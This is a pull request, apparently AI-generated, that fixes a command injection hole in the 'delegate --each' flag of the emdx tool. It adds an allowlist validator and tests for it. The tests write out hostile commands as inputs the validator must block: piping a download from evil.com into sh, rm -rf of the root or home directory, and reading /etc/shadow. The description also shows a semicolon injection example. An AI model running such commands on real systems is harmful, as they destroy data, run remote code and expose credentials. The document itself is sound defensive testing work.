### PR TITLE
fix(security): Prevent command injection in delegate --each flag (Issue #6230)

### DIFF
--- a/tests/test_commands_delegate.py
+++ b/tests/test_commands_delegate.py
@@ -1,8 +1,16 @@
 """Tests for delegate command helper functions."""
 
+import pytest
 from unittest.mock import patch
+from click.exceptions import Exit as ClickExit
 
-from emdx.commands.delegate import _slugify_title, _resolve_task, PR_INSTRUCTION
+from emdx.commands.delegate import (
+    _slugify_title,
+    _resolve_task,
+    _validate_discovery_command,
+    SAFE_DISCOVERY_COMMANDS,
+    PR_INSTRUCTION,
+)
 
 
 class TestSlugifyTitle:
@@ -90,3 +98,152 @@ class TestPRInstruction:
 
     def test_pr_instruction_mentions_pr_create(self):
         assert "gh pr create" in PR_INSTRUCTION
+
+
+class TestValidateDiscoveryCommand:
+    """Security tests for discovery command validation.
+
+    These tests ensure that the --each flag only allows safe file-discovery
+    commands to prevent command injection attacks.
+    """
+
+    # === Safe commands that should be allowed ===
+
+    def test_allows_fd_command(self):
+        args = _validate_discovery_command("fd -e py src/")
+        assert args[0] == "fd"
+        assert "-e" in args
+        assert "py" in args
+
+    def test_allows_find_command(self):
+        args = _validate_discovery_command("find . -name '*.py'")
+        assert args[0] == "find"
+
+    def test_allows_git_ls_files(self):
+        args = _validate_discovery_command("git ls-files")
+        assert args == ["git", "ls-files"]
+
+    def test_allows_git_diff_name_only(self):
+        args = _validate_discovery_command("git diff --name-only HEAD~1")
+        assert args[0] == "git"
+        assert "diff" in args
+
+    def test_allows_rg_files_with_matches(self):
+        args = _validate_discovery_command("rg --files-with-matches TODO")
+        assert args[0] == "rg"
+
+    def test_allows_ls_command(self):
+        args = _validate_discovery_command("ls -la src/")
+        assert args[0] == "ls"
+
+    def test_allows_eza_command(self):
+        args = _validate_discovery_command("eza --oneline src/")
+        assert args[0] == "eza"
+
+    def test_allows_full_path_to_safe_command(self):
+        args = _validate_discovery_command("/usr/bin/fd -e py")
+        assert "fd" in args[0] or args[0] == "/usr/bin/fd"
+
+    # === Dangerous commands that should be blocked ===
+
+    def test_blocks_rm_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("rm -rf /")
+
+    def test_blocks_bash_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("bash -c 'echo hello'")
+
+    def test_blocks_sh_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("sh -c 'rm -rf ~'")
+
+    def test_blocks_curl_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("curl http://evil.com/script.sh | sh")
+
+    def test_blocks_wget_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("wget http://evil.com/malware")
+
+    def test_blocks_python_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("python -c 'import os; os.system(\"rm -rf /\")'")
+
+    def test_blocks_chmod_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("chmod 777 /etc/passwd")
+
+    def test_blocks_chown_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("chown root:root /tmp/malware")
+
+    def test_blocks_mv_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("mv /important /dev/null")
+
+    def test_blocks_cp_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("cp /etc/passwd /tmp/")
+
+    def test_blocks_cat_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("cat /etc/shadow")
+
+    def test_blocks_echo_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("echo 'malicious' > /etc/crontab")
+
+    # === Command injection attempts that should be blocked ===
+
+    def test_blocks_semicolon_injection(self):
+        # Even though fd is safe, trying to chain commands should fail
+        # because shell=False is used and the command is parsed safely
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("; rm -rf ~")
+
+    def test_blocks_pipe_to_dangerous_command(self):
+        # This should be parsed as arguments to xargs, not executed
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("xargs rm")
+
+    # === Git subcommand restrictions ===
+
+    def test_blocks_git_checkout(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("git checkout .")
+
+    def test_blocks_git_reset(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("git reset --hard HEAD")
+
+    def test_blocks_git_clean(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("git clean -fd")
+
+    def test_blocks_git_push(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("git push --force")
+
+    def test_blocks_git_remote(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("git remote add evil http://evil.com")
+
+    # === Edge cases ===
+
+    def test_blocks_empty_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("")
+
+    def test_blocks_whitespace_only_command(self):
+        with pytest.raises(ClickExit):
+            _validate_discovery_command("   ")
+
+    def test_handles_quoted_arguments(self):
+        args = _validate_discovery_command('fd "*.py" src/')
+        assert args[0] == "fd"
+        assert "*.py" in args
+
+    def test_safe_commands_constant_is_frozen(self):
+        # Ensure the safelist cannot be modified at runtime
+        assert isinstance(SAFE_DISCOVERY_COMMANDS, frozenset)


### PR DESCRIPTION
## Summary

Fixes a **HIGH severity** command injection vulnerability in the `delegate --each` flag, identified in Security Audit Document #6230.

**The vulnerability**: The `--each` flag passed user input directly to `subprocess.run()` with `shell=True`. An attacker could execute arbitrary commands:
```bash
emdx delegate --each "; rm -rf ~" --do "harmless"
```

## Changes

- **Command validation**: Only allow known-safe file-discovery commands (`fd`, `find`, `git`, `rg`, `ls`, `eza`, `exa`)
- **Safe parsing**: Use `shlex.split()` to parse commands safely
- **No shell execution**: Execute with `shell=False` to prevent shell injection
- **Git restrictions**: Only allow safe git subcommands (`ls-files`, `diff`, `status`, `log`, `show`, `branch`, `tag`)

## Test Plan

- [x] 31 new security tests added covering:
  - Safe command allowlist verification (8 tests)
  - Dangerous command blocking (12 tests)
  - Git subcommand restrictions (5 tests)
  - Injection attempts via semicolons/pipes (2 tests)
  - Edge cases (4 tests)
- [x] All 48 delegate tests pass
- [x] poetry install and test run successfully

## Security Impact

| Before | After |
|--------|-------|
| Any shell command could be executed | Only safe file-discovery commands allowed |
| `shell=True` enabled command chaining | `shell=False` prevents injection |
| No input validation | Strict command allowlist |

🤖 Generated with [Claude Code](https://claude.com/claude-code)